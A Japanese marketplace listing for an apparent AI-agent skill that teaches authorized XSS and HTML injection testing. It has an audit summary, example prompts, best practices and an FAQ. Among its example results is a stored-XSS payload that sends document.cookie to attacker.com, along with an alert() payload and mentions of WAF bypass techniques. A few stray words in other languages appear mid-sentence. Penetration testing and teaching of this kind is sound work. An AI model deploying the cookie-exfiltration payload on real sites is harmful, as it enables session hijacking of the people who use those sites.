スキル xss-html-injection
📦
xss-html-injection
安全 ⚡
スクリプトを含む⚙️
外部コマンド🌐
ネットワークアクセス📁
ファイルシステムへのアクセス
XSSおよびHTMLインジェクション脆弱性のテスト
Webアプリケーションには、攻撃者がセッションや認証情報を盗み出すために悪用するクロスサイトスクリプティングやHTMLインジェクションの脆弱性が含まれていることが少なくありません。このスキルは、承認されたセキュリティ評価においてクライアントサイドのインジェクション脆弱性を体系的に検出・悪用・検証するための方法論を提供します。
対応: Claude Codex Code(CC)
1
スキルZIPをダウンロード
2
Claudeでアップロード
設定 → 機能 → スキル → スキルをアップロードへ移動
3
オンにして利用開始
テストする
「xss-html-injection」を使用しています。 検索パラメータに反映型XSSをテストする
期待される結果:
- 脆弱性発見: /search?q= パラメータにおける反映型XSS
- 深刻度: 中程度
- ペイロード: <img src=x onerror=alert(document.domain)>
- コンテキスト: HTMLボディ - エンコードなしの反映
- 推奨事項: すべてのユーザー入力に出力エンコーディングを実装する
「xss-html-injection」を使用しています。 ユーザープロファイルbioフィールドに保存型XSSをテストする
期待される結果:
- 脆弱性発見: ユーザープロファイルbioにおける保存型XSS
- 深刻度: 高(永続的、全ユーザーに影響)
- ペイロード: <script>fetch('https://attacker.com/log?c='+document.cookie)</script>
- 影響: プロファイルを表示する全ユーザーのセッションハイジャック
- 推奨事項: 厳密な入力検証と出力エンコーディングを実装する
セキュリティ監査
安全v1 • 2/25/2026
This is a legitimate security testing skill for XSS and HTML injection vulnerability assessment. All 121 static findings are FALSE POSITIVES - they represent educational examples of vulnerable code patterns (eval, innerHTML, document.write) and demonstration payloads using example URLs (attacker.com). The skill teaches security professionals how to identify and test for client-side injection vulnerabilities in authorized penetration tests.
1
スキャンされたファイル
505
解析された行数
5
検出結果
1
総監査数
低リスクの問題 (1)
Educational Security Testing Content - False Positives
All 121 static findings are FALSE POSITIVES. The skill contains: (1) Examples of vulnerable code patterns (eval, innerHTML, document.write at lines 190,194,195,198,319,328,467) - teaching testers to identify these sinks; (2) Demonstration payloads using example URLs (attacker.com) - standard practice in security documentation; (3) References to keylogger and credential access as attack vectors - essential knowledge for defenders. This is legitimate educational content for authorized penetration testing.
リスク要因
⚡ スクリプトを含む (7)
⚙️ 外部コマンド (64)
SKILL.md:51-60 SKILL.md:60-65 SKILL.md:65-80 SKILL.md:80-110 SKILL.md:110-117 SKILL.md:117-121 SKILL.md:121-151 SKILL.md:151-158 SKILL.md:158-170 SKILL.md:170-175 SKILL.md:175-181 SKILL.md:181-188 SKILL.md:188-202 SKILL.md:202-207 SKILL.md:207-217 SKILL.md:217-221 SKILL.md:221-234 SKILL.md:234-241 SKILL.md:241-259 SKILL.md:259-264 SKILL.md:264-275 SKILL.md:275-281 SKILL.md:281-297 SKILL.md:297-301 SKILL.md:301-313 SKILL.md:313-317 SKILL.md:317-322 SKILL.md:322-331 SKILL.md:331-333 SKILL.md:333-337 SKILL.md:337-347 SKILL.md:347-352 SKILL.md:352-358 SKILL.md:358-364 SKILL.md:364-365 SKILL.md:365-366 SKILL.md:366-367 SKILL.md:367-368 SKILL.md:368-369 SKILL.md:369-370 SKILL.md:370-373 SKILL.md:373-377 SKILL.md:377-380 SKILL.md:380-392 SKILL.md:392-421 SKILL.md:421-426 SKILL.md:426-431 SKILL.md:431-436 SKILL.md:436-445 SKILL.md:445-447 SKILL.md:447-450 SKILL.md:450-452 SKILL.md:452-455 SKILL.md:455-457 SKILL.md:457-466 SKILL.md:466-468 SKILL.md:468-471 SKILL.md:471-473 SKILL.md:473-482 SKILL.md:482-484 SKILL.md:484-487 SKILL.md:487-489 SKILL.md:489-498 SKILL.md:498
🌐 ネットワークアクセス (27)
SKILL.md:136 SKILL.md:382 SKILL.md:124 SKILL.md:130 SKILL.md:136 SKILL.md:145 SKILL.md:160 SKILL.md:163 SKILL.md:166 SKILL.md:169 SKILL.md:223 SKILL.md:226 SKILL.md:230 SKILL.md:246 SKILL.md:253 SKILL.md:254 SKILL.md:258 SKILL.md:375 SKILL.md:382 SKILL.md:434 SKILL.md:446 SKILL.md:451 SKILL.md:456 SKILL.md:456 SKILL.md:472 SKILL.md:483 SKILL.md:488
📁 ファイルシステムへのアクセス (1)
検出されたパターン
Pattern: eval() in Code ExamplesPattern: document.write and innerHTML in ExamplesPattern: Network Requests in Payloads
監査者: claude
品質スコア
38
アーキテクチャ
100
保守性
87
コンテンツ
21
コミュニティ
100
セキュリティ
87
仕様準拠
作れるもの
セキュリティコンサルタントによるWebアプリケーションテスト
承認されたペネトレーションテストを実施し、客户WebアプリケーションのXSS脆弱性を特定して修正提案を提供する。
開発者による入力処理の検証
開発中にカスタムWebアプリケーションをテストし、適切な入力サニタイゼーションと出力エンコーディングが実装されていることを確認する。
QAエンジニアによるセキュリティ回帰テスト
XSSおよびHTMLインジェクションテストをセキュリティ回帰テストスイートに含め、本番環境へのデプロイ前に脆弱性を検出する。
これらのプロンプトを試す
基本的なXSS検出
XSS HTMLインジェクションスキルを使用して、https://example.comのログインフォームに反映型XSS脆弱性をテストしてください。すべての入力フィールドを特定し、基本的なXSSペイロードをテストしてください。
保存型XSS評価
XSS HTMLインジェクションスキルを使用してコメントセクションの保存型XSSをテストしてください。他のユーザーがコンテンツを表示したときに永続化して実行されるテストペイロードを作成してください。
DOMベースXSSの発見
XSS HTMLインジェクションスキルを使用して、https://example.com/dashboardのJavaScriptをDOMベースXSSについて分析してください。location.hashとlocation.searchの処理を確認してください。
フィルタバイパス検証
XSS HTMLインジェクションスキルを使用して、https://example.comのWAFが一般的なXSSペイロードをブロックするかどうかをテストしてください。HTMLエンコード、Unicodeエンコード、タグ変異バイパス技術を試してください。
ベストプラクティス
- テスト前に常に書面による承認を取得する
- 意図しないユーザーに持続・拡散しない制御された実証ペイロードを使用する
- 重大な脆弱性は適切なインシデント対応チャネルを通じて直ちに報告する
回避
- 明示的な書面による承認なしに本番システムをテストする
- 発見した脆弱性を不正アクセスまたはデータ窃取に使用する
- サービス拒否やシステム損傷を引き起こす可能性のあるペイロードをデプロイする
よくある質問
このスキルは対象ウェブサイトに対して実際の攻撃を実行しますか?
いいえ。このスキルは承認されたセキュリティテストのための方法論とペイロードを提供します。ユーザーはテスト前に明示的な書面による許可が必要です。
このスキルですべてのタイプのXSSをテストできますか?
このスキルは保存型、反映型、DOMベースのXSSをカバーしています。ただし、変異XSSなどの一部の高度なバリアントには追加の専門技術が必要な場合があります。
このスキルを使用する前にどのような承認が必要ですか?
システム所有者からの書面による承認が必要です。これには、定義されたスコープ、許可されたテスト方法、およびキャプチャしたデータの取り扱い手順を含める必要があります。
CSPが適用されたアプリケーションでこのスキルは動作しますか?
CSPは多くのXSSペイロードをブロックできます。このスキルにはCSPバイパステストの技術が含まれていますが、適切に 구성된CSPポリシーによっては悪用が成功しない場合があります。
XSS経由でセッションcookie всегда窃取できますか?
いいえ。HttpOnlyフラグが付けられたcookieはJavaScriptからアクセスできません。現代アプリケーションはセッションcookieにこの保護を使用する必要があります。
重大なXSS脆弱性を発見した場合はどうすべきですか?
承認契約に従って適切なチャネルを通じて直ちに報告してください。概念実証で発見事項を記録し、所有者に修正提案を提供してください。